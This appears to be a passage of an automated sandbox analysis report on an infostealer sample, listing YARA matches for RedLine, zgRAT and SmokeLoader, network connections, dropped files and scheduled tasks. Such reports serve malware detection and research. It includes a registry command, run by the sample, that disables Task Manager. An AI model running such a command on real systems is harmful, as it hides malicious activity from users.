Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2124198557.0000000000448000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: aspnet_regiis.exe, 00000036.00000003.2103386147.000000002347E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2124198557.0000000000448000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: aspnet_regiis.exe, 00000036.00000003.2103386147.000000002347E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: aspnet_regiis.exe, 00000036.00000003.2103386147.000000002347E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2124198557.0000000000448000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2124198557.0000000000448000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/0
Source: aspnet_regiis.exe, 00000036.00000003.2103386147.000000002347E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.31.196.208:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.28.36.182:443 -> 192.168.2.7:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.7:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.67.42.145:443 -> 192.168.2.7:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49769 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000021.00000002.2005785440.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2007530947.0000000002521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Source: Explorers.exe, 0000002A.00000002.1954319592.00000000028C9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_7ffd0347-e

System Summary

Malicious sample detected (through community Yara rule)

Source: 37.2.RegAsm.exe.572b7e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 37.2.RegAsm.exe.572b7e.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 42.0.Explorers.exe.230000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 36.2.alex5555555.exe.a1fda6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 36.2.alex5555555.exe.a1fda6.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 36.2.alex5555555.exe.a1fda6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 36.2.alex5555555.exe.a1fda6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 37.2.RegAsm.exe.572b7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 37.2.RegAsm.exe.572b7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 36.2.alex5555555.exe.8b100f.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 37.2.RegAsm.exe.3e25570.5.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 37.2.RegAsm.exe.403de7.2.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 36.2.alex5555555.exe.8b100f.2.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 37.2.RegAsm.exe.403de7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 37.2.RegAsm.exe.3e25570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 00000021.00000002.2010009861.00000000025BE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000021.00000002.2005785440.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 00000021.00000002.2005592482.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000021.00000002.2007530947.0000000002521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen

PE file contains section with special chars

Source: 6.exe.1.dr	Static PE information: section name: .vmp-~&
Source: 6.exe.1.dr	Static PE information: section name: .vmp-~&
Source: 6.exe.1.dr	Static PE information: section name: .vmp-~&
Source: 7.exe.1.dr	Static PE information: section name:
Source: 7.exe.1.dr	Static PE information: section name: .idata
Source: 7.exe.1.dr	Static PE information: section name:
Source: axplong.exe.9.dr	Static PE information: section name:
Source: axplong.exe.9.dr	Static PE information: section name: .idata
Source: axplong.exe.9.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 18_2_0060CA9A NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

18_2_0060CA9A

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File created: C:\Windows\Tasks\Hkbsse.job
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	File created: C:\Windows\Tasks\Hkbsse.job

Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe

File deleted: C:\Windows\Tasks\Hkbsse.job

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_0120DC74	1_2_0120DC74
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_05218D28	1_2_05218D28
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_05216948	1_2_05216948
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_05210007	1_2_05210007
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_05210040	1_2_05210040
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_05218D18	1_2_05218D18
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_05836248	1_2_05836248
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_0583FC28	1_2_0583FC28
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_05830700	1_2_05830700
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_05830710	1_2_05830710
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_05835630	1_2_05835630
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_0583E0AF	1_2_0583E0AF
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_0583E0E8	1_2_0583E0E8
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_0583FC19	1_2_0583FC19
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_05835978	1_2_05835978
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D407A0	1_2_06D407A0
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D445F8	1_2_06D445F8
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D42590	1_2_06D42590
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D41510	1_2_06D41510
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D42121	1_2_06D42121
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D42F68	1_2_06D42F68
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D45C50	1_2_06D45C50
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D48858	1_2_06D48858
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D49868	1_2_06D49868
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D4E990	1_2_06D4E990
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D46900	1_2_06D46900
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D41500	1_2_06D41500
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D45C40	1_2_06D45C40
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006BE410	10_2_006BE410
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006F3048	10_2_006F3048
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006B4CD0	10_2_006B4CD0
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006E7D63	10_2_006E7D63
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006F763B	10_2_006F763B
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006F6EE9	10_2_006F6EE9
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006B4AD0	10_2_006B4AD0
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006F775B	10_2_006F775B
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006F8700	10_2_006F8700
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006F2BB0	10_2_006F2BB0
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 12_2_0016C207	12_2_0016C207
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 12_2_00168D09	12_2_00168D09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_026125D8	13_2_026125D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0261DC74	13_2_0261DC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_04DB8FA0	13_2_04DB8FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_04DB6948	13_2_04DB6948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_04DB0040	13_2_04DB0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_04DB0007	13_2_04DB0007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_04DB8F90	13_2_04DB8F90
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_005F9910	18_2_005F9910
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_005FA909	18_2_005FA909
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_00633048	18_2_00633048
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_006160A2	18_2_006160A2
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_00611512	18_2_00611512
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0063763B	18_2_0063763B
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0063775B	18_2_0063775B
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_00638700	18_2_00638700
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_005F4AD0	18_2_005F4AD0
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_00632BB0	18_2_00632BB0
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_005F4CD0	18_2_005F4CD0
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_00627D63	18_2_00627D63
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_00610D23	18_2_00610D23
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_00613D01	18_2_00613D01
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_00636EE9	18_2_00636EE9

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: String function: 0060DE90 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: String function: 0060D852 appears 75 times
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: String function: 00607F00 appears 123 times
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: String function: 0015A150 appears 49 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7752 -ip 7752

Source: Installer[1].exe.10.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 914 bytes, 1 file, at 0x2c +A "ins.bat", ID 687, number 1, 1 datablock, 0x1503 compression
Source: Installer.exe.10.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 914 bytes, 1 file, at 0x2c +A "ins.bat", ID 687, number 1, 1 datablock, 0x1503 compression

Source: vcf-to-csv-converter[1].exe.10.dr	Static PE information: Number of sections : 12 > 10
Source: O3B6wY7ZkFhh.exe.10.dr	Static PE information: Number of sections : 12 > 10

Source: 1Vkf7silOj.exe, 00000001.00000000.1308223567.0000000000974000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePrincedoms.exe8 vs 1Vkf7silOj.exe
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000003371000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesetup.exeR vs 1Vkf7silOj.exe
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000003376000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesetup.exeR vs 1Vkf7silOj.exe
Source: 1Vkf7silOj.exe, 00000001.00000002.1583569616.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 1Vkf7silOj.exe
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 1Vkf7silOj.exe
Source: 1Vkf7silOj.exe	Binary or memory string: OriginalFilenamePrincedoms.exe8 vs 1Vkf7silOj.exe

Source: 1Vkf7silOj.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001

Source: 37.2.RegAsm.exe.572b7e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 37.2.RegAsm.exe.572b7e.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 42.0.Explorers.exe.230000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 36.2.alex5555555.exe.a1fda6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 36.2.alex5555555.exe.a1fda6.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 36.2.alex5555555.exe.a1fda6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 36.2.alex5555555.exe.a1fda6.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 37.2.RegAsm.exe.572b7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 37.2.RegAsm.exe.572b7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 36.2.alex5555555.exe.8b100f.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 37.2.RegAsm.exe.3e25570.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 37.2.RegAsm.exe.403de7.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 36.2.alex5555555.exe.8b100f.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 37.2.RegAsm.exe.403de7.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 37.2.RegAsm.exe.3e25570.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 00000021.00000002.2010009861.00000000025BE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000021.00000002.2005785440.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
